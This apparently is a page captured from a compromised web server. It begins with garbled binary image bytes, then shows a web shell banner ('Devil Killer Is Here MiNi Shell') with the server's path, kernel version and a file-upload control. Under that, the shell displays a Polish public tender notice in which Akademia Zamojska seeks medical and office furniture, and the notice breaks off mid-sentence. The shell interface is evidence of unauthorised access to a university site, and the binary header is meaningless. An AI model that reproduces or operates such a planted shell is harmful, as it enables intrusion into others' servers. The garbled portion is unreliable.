JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220311/0008349701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa mebli medycznych i biurowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Zamojska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 060044114</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pereca 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zamość</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rektorat@akademiazamojska.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://upz.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Uczelnia publiczna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa mebli medycznych i biurowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38aedeed-a068-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00083497</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Część zamówienia realizowana jest w ramach projektu pn. „Wdrożenie programu rozwojowego i uruchomienie działalności Monoprofilowego Centrum Symulacji Medycznej na Uczelni Państwowej w Zamościu” w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego. Umowa o dofinansowanie projektu nr POWR.05.03.00-00-0023/19 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> a https://upz-zamosc.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://upzzamosc.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy<br/>użyciu Platformy znajdującej się pod adresem https://upzzamosc.ezamawiajacy.pl/servlet/HomeServlet oraz przy użyciu poczty elektronicznej:<br/>rektorat@akademiazamojska.edu.pl<br/>2. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji (innych niż oferta)<br/>przekazywanych na adres e mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na<br/>adres e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń,<br/>wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/ wysłania na Platformie.<br/>3. Ogólne zasady korzystania z Platformy, z zastrzeżeniem pkt 10 niniejszego rozdziału:<br/>3.1. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>Zamawiającego pod adresem: https://upz-zamosc.ezamawiajacy.pl/servlet/HomeServlet<br/>3.2. Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta.<br/>3.3. Wykonawca zakłada konto wykonując kolejne kroki procesu rejestracyjnego: podaje adres e-mail,<br/>ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika<br/>polecenie „Zarejestruj się”.<br/>3.4. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający<br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestracje w procesie złożenia Oferty.<br/>3.5. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o<br/>możliwości przyspieszenia procedury założenia konta i wówczas należy skontaktować się pod<br/>numerem telefonu podanym w ww. potwierdzeniu.<br/>3.6. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu.<br/>3.7. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz<br/>informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy w zakładce<br/>&#34;Korespondencja z wykonawcami&#34;. Za datę przekazania zawiadomień oraz informacji przyjmuje się ich<br/>datę wczytania do Systemu<br/>4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy w zakładce &#34;Zadaj pytanie&#34;:<br/>4.1. w celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz<br/>„Zadaj pytanie”. Powoduje to otwarcie okna, w którym należy uzupełnić wszystkie dane Wykonawcy,<br/>temat i treść/przedmiot pytania,<br/>4.2. po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca<br/>klika klawisz „Potwierdź”,<br/>4.3. Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;Pytanie<br/>wysłane&#34;.<br/>4.4. Zamawiający udziela wyjaśnień na zasadach opisanych w rozdziale IX.<br/>4.5. Wykonawca zadając pytanie Zamawiającemu winien dołożyć wszelkich starań, aby nie ujawnić<br/>swojej tożsamości np. w temacie lub treści pytania. W przypadku konieczności załączenia<br/>dodatkowego dokumentu (dokumentów) w postaci pliku Wykonawca winien przekazać go w formie<br/>uniemożliwiającej identyfikację nadawcy.<br/>5. Więcej informacji znajduje się w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://upz-zamosc.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>a) administratorem Pani/Pana danych osobowych jest Akademia Zamojska, ul. Pereca 2, 22-400<br/>Zamość, e-mail: rektorat@akademiazamojska.edu.pl;<br/>b) z inspektorem ochrony danych można się skontaktować pisząc na adres ul. Pereca 2, 22-400<br/>Zamość lub mailem na konto: iod@akademiazamojska.edu.pl<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, podstawą prawną<br/>przetwarzania jest ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U.2019<br/>poz.2019 ze zm.), dalej „ustawa Pzp”;<br/>d) odbiorcami Pani/Pana danych osobowych mogą być podmioty uprawnione do ich otrzymywania na<br/>podstawie przepisów prawa lub umowy, w tym dostawcy usług informatycznych;<br/>e) ze względu na jawność postępowania o udzielenie zamówienia publicznego, odbiorcami Pani/Pana<br/>danych osobowych mogą być wszystkie zainteresowane osoby lub podmioty w oparciu o art. 18 ust. 1,<br/>art. 74 ust. 1 ustawy Pzp oraz ustawę z dnia 6 września 2001 r.o dostępie do informacji publicznej (Dz.<br/>U. 2001 Nr 112 poz. 1198). Ograniczenie dostępu do danych może wystąpić jedynie w szczególnych<br/>przypadkach, jeśli jest to uzasadnione ochroną prywatności, interesem publicznym lub informacja<br/>stanowi tajemnicę przedsiębiorstwa;<br/>f) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania umowy w sprawie<br/>zamówienia publicznego;<br/>g) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>h) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>i) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym<br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników,<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego,<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO - RODO - na adres<br/>Biuro Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00 - 193 Warszawa;.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Odbiorcą Pani/Pana danych osobowych będzie spółka Otwarty Rynek Elektroniczny S.A. siedzibą w<br/>Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego<br/>Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII<br/>Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON:<br/>017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Zamawiający prowadzi<br/>postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AI.0920.02.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i ustawienie przez Wykonawcę fabrycznie nowych mebli medycznych. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6.1 do SWZ.<br/>Pozostałe warunki zostały określone w projektowanych postanowieniach umowy (zał. nr 7 do SWZ)<br/>Wymagania i warunki realizacji zamówienia: <br/>	realizacja przedmiotu zamówienia nastąpi w terminie zaoferowanym przez Wykonawcę, jednak nie później niż 90 dni kalendarzowych od dnia zawarcia umowy. Za dzień realizacji przedmiotu zamówienia uznany będzie dzień, w którym Wykonawca dostarczy, zmontuje i ustawi w miejscach wskazanych przez Zamawiającego przedmiot zamówienia (termin stanowi kryterium oceny ofert) ; <br/>	oferowane meble muszą być fabrycznie nowe i nieużywane. Nie mogą pochodzić z odzysku, nie mogą pochodzić z projektów realizowanych u innych klientów, nie mogą pochodzić z ekspozycji w punktach sprzedaży oraz muszą być wolne od jakichkolwiek wad fizycznych i prawnych czy roszczeń osób trzecich, muszą być wykonane z materiałów posiadających wszelkie wymagane prawem certyfikaty i aprobaty dopuszczające do sprzedaży i użytkowania na terenie Rzeczypospolitej Polskiej; <br/>	wymagane jest, aby meble zostały dostarczone do Zamawiającego wraz z rozładunkiem (wniesieniem do miejsca wskazanego przez Zamawiającego) i montażem. Przez montaż należy rozumieć: instalację kompletnych i gotowych do użycia mebli z uwzględnieniem ich dostosowania do pomieszczeń, w których będą użytkowane oraz do elementów znajdujących się w tych pomieszczeniach. Montaż będzie polegał w szczególności na: ustawieniu, wypoziomowaniu oraz ustawieniu w sposób zapewniający bezpieczeństwo podczas ich użytkowania poszczególnych elementów wyposażenia będących przedmiotem zamówienia; <br/>	Zamawiający wymaga, aby przedmiot zamówienia był wykonany starannie, z dużą dbałością o szczegóły i z materiałów opisanych w sposób szczegółowy w Opisie przedmiotu zamówienia. W celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, Zamawiający zamieścił w Opisie przedmiotu zamówienia rysunki poglądowe; <br/>	Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia zobowiązany będzie <br/>do skontaktowania się z Zamawiającym w celu uściślenia szczegółów w zakresie wykonania mebli, dokonania dokładnego pomiaru, uzgodnienia kolorów płyt meblowych i tapicerki. Wszelkie uwagi oraz wymagania Zamawiającego zgłoszone w ramach w/w zakresu Wykonawca będzie zobowiązany uwzględnić w trakcie realizacji przedmiotu zamówienia. Wybór zostanie dokonany na podstawie przedstawionych przez Wykonawcę próbników płyt oraz tkanin tapicerskich. Próbniki tkanin muszą posiadać atesty lub sprawozdania z badań potwierdzające skład oraz wymaganą wytrzymałość na ścieranie;<br/>	Wykonawca odpowiada za wszelkie wady prawne zaoferowanych i dostarczonych mebli, w tym również za ewentualne roszczenia osób trzecich wynikające z naruszenia praw własności intelektualnej lub przemysłowej, w tym praw autorskich, patentów, praw ochronnych na znaki towarowe oraz praw z rejestracji na wzory użytkowe i przemysłowe, pozostające w związku z wprowadzeniem mebli do obrotu na terytorium Rzeczypospolitej Polskiej; za ewentualne roszczenia osób trzecich wynikające z praw autorskich lub patentowych, dotyczące przedmiotu dostawy odpowiada wyłącznie Wykonawca; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192000-2 - Meble medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie<br/>kryteriów oceny ofert określonych w dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i ustawienie przez Wykonawcę fabrycznie nowych <br/>krzeseł i foteli; Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6.2 do SWZ.<br/>Pozostałe warunki zostały określone w projektowanych postanowieniach umowy (zał. nr 7 do SWZ)<br/>Wymagania i warunki realizacji zamówienia: <br/>	realizacja przedmiotu zamówienia nastąpi w terminie zaoferowanym przez Wykonawcę, jednak nie później niż 90 dni kalendarzowych od dnia zawarcia umowy. Za dzień realizacji przedmiotu zamówienia uznany będzie dzień, w którym Wykonawca dostarczy, zmontuje i ustawi w miejscach wskazanych przez Zamawiającego przedmiot zamówienia (termin stanowi kryterium oceny ofert); <br/>	oferowane meble muszą być fabrycznie nowe i nieużywane. Nie mogą pochodzić z odzysku, nie mogą pochodzić z projektów realizowanych u innych klientów, nie mogą pochodzić z ekspozycji w punktach sprzedaży oraz muszą być wolne od jakichkolwiek wad fizycznych i prawnych czy roszczeń osób trzecich, muszą być wykonane z materiałów posiadających wszelkie wymagane prawem certyfikaty i aprobaty dopuszczające do sprzedaży i użytkowania na terenie Rzeczypospolitej Polskiej; <br/>	wymagane jest, aby meble zostały dostarczone do Zamawiającego wraz z rozładunkiem (wniesieniem do miejsca wskazanego przez Zamawiającego) i montażem. Przez montaż należy rozumieć: instalację kompletnych i gotowych do użycia mebli z uwzględnieniem ich dostosowania do pomieszczeń, w których będą użytkowane oraz do elementów znajdujących się w tych pomieszczeniach. Montaż będzie polegał w szczególności na: ustawieniu, wypoziomowaniu oraz ustawieniu w sposób zapewniający bezpieczeństwo podczas ich użytkowania poszczególnych elementów wyposażenia będących przedmiotem zamówienia; <br/>	Zamawiający wymaga, aby przedmiot zamówienia był wykonany starannie, z dużą dbałością o szczegóły i z materiałów opisanych w sposób szczegółowy w Opisie przedmiotu zamówienia. W celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, Zamawiający zamieścił w Opisie przedmiotu zamówienia rysunki poglądowe; <br/>	Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia zobowiązany będzie <br/>do skontaktowania się z Zamawiającym w celu uściślenia szczegółów w zakresie wykonania mebli, dokonania dokładnego pomiaru, uzgodnienia kolorów płyt meblowych i tapicerki. Wszelkie uwagi oraz wymagania Zamawiającego zgłoszone w ramach w/w zakresu Wykonawca będzie zobowiązany uwzględnić w trakcie realizacji przedmiotu zamówienia. Wybór zostanie dokonany na podstawie przedstawionych przez Wykonawcę próbników płyt oraz tkanin tapicerskich. Próbniki tkanin muszą posiadać atesty lub sprawozdania z badań potwierdzające skład oraz wymaganą wytrzymałość na ścieranie;<br/>	Wykonawca odpowiada za wszelkie wady prawne zaoferowanych i dostarczonych mebli, w tym również za ewentualne roszczenia osób trzecich 